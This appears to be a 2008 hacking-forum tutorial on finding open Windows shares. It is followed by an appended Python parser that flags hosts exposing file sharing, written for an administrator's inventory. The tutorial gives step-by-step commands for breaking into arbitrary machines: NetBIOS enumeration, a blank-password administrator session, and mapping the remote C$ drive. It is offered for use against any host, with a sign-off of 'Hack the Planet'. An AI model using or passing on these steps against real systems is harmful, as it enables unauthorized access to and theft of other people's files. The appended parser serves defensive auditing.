ssym3tryy
May 14th, 2008, 09:36 PM
Searching for open Windows Shares with NetBIOS - a tutorial by sym3try
This is an older exploit, but it still works on many computers.
STEP 1
From the command prompt, type this command:
c:\>nbtstat -A <ip_address>
You will get one of two possible responses:
1. Host Not Found. This means that either the host is down or is blocking your requests. You will have to try another host IP address.
2. You will get an output that resembles this:
C:\>nbtstat -A 192.168.2.10
Wireless Network Connection:
Node IpAddress: [192.168.2.10] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
FRANK-A1EA4AC4D<00> UNIQUE Registered
FRANK-A1EA4AC4D<20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-0D-0B-BD-4C-94
***What you are looking for in this output is for one of the NetBIOS entries to contain a Type of "<20>" which indicates that File Sharing is enabled.***
STEP 2
Initiate a NULL Session with the host.
C:\>net use \\<ip_address>\IPC$ "" /user:administrator
This command attempts to connect to the remote Windows share using the default username of "administrator" with a blank password.
This command will either return a reply of "The Command Completed Successfully" or it will return an error, which would indicate that a unique password is set. (cracking these types of passwords is beyond the scope of this specific tutorial, but hey, feel free to write one and post it :D )
STEP 3
Obtain a list of the host's network shares.
C:\>net view \\<ip_address>
This will list all available network shares.
STEP 4
Connect to the share.
C:\>net use * \\<ip_address>\<share_name>$
Example: net use * \\192.168.2.10\c$
Once this operation completes, open up "My Computer" and the network share should now be available, listed as one of your drives.
Enjoy!
SYM3TRY
Hack the Planet
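The <20> check from STEP 1, as an added example (not code from the original post): a Python parser for the name table that `nbtstat -A` prints, which decodes the well-known NetBIOS suffixes and reports whether a host registers the File Server service, so an administrator can inventory which machines on a subnet are offering shares. The sample text is the output quoted above, embedded as a constructed input; the suffix table is the standard NetBIOS one, and the function and class names are my own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Well-known NetBIOS name suffixes: (suffix byte, UNIQUE|GROUP) -> service.
SUFFIX_MEANING = {
    (0x00, "UNIQUE"): "Workstation Service (computer name)",
    (0x00, "GROUP"): "Domain/Workgroup name",
    (0x01, "GROUP"): "Master Browser (__MSBROWSE__)",
    (0x03, "UNIQUE"): "Messenger Service",
    (0x1B, "UNIQUE"): "Domain Master Browser",
    (0x1D, "UNIQUE"): "Master Browser",
    (0x1E, "GROUP"): "Browser Service Elections",
    (0x20, "UNIQUE"): "File Server Service",   # the <20> entry the tutorial looks for
}

# One table row: NAME<hh>  UNIQUE|GROUP  Registered (name may be space-padded)
ROW_RE = re.compile(r"^\s*(?P<name>\S+?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
                    r"(?P<kind>UNIQUE|GROUP)\s+(?P<status>\w+)")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

@dataclass
class NbtEntry:
    name: str
    suffix: int
    kind: str      # UNIQUE or GROUP
    status: str
    meaning: str

def parse_nbtstat(text: str) -> tuple[list[NbtEntry], str | None]:
    """Parse the name table rows and the MAC address out of nbtstat -A output."""
    entries, mac = [], None
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            suffix, kind = int(m["suffix"], 16), m["kind"].upper()
            entries.append(NbtEntry(m["name"], suffix, kind, m["status"],
                                    SUFFIX_MEANING.get((suffix, kind), "unknown/other")))
        elif (mm := MAC_RE.search(line)):
            mac = mm.group(1).upper()
    return entries, mac

def file_sharing_exposed(entries: list[NbtEntry]) -> bool:
    """True when the host registered the File Server service (<20>), i.e. it offers SMB shares."""
    return any(e.suffix == 0x20 and e.kind == "UNIQUE" for e in entries)

def audit(text: str) -> dict:
    """Summarise one host's nbtstat -A output for an inventory report."""
    entries, mac = parse_nbtstat(text)
    host = next((e.name for e in entries if e.suffix == 0x00 and e.kind == "UNIQUE"), None)
    group = next((e.name for e in entries if e.suffix == 0x00 and e.kind == "GROUP"), None)
    return {"host": host, "workgroup": group, "mac": mac,
            "file_sharing": file_sharing_exposed(entries), "entries": len(entries)}

# Constructed sample: the nbtstat -A output quoted in the tutorial above.
SAMPLE = """Wireless Network Connection:
Node IpAddress: [192.168.2.10] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
FRANK-A1EA4AC4D<00> UNIQUE Registered
FRANK-A1EA4AC4D<20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-0D-0B-BD-4C-94
"""
```

Feed it the saved output of `nbtstat -A <ip>` for each host you manage; a `file_sharing` of True on a machine that is not meant to be a file server is the finding to follow up.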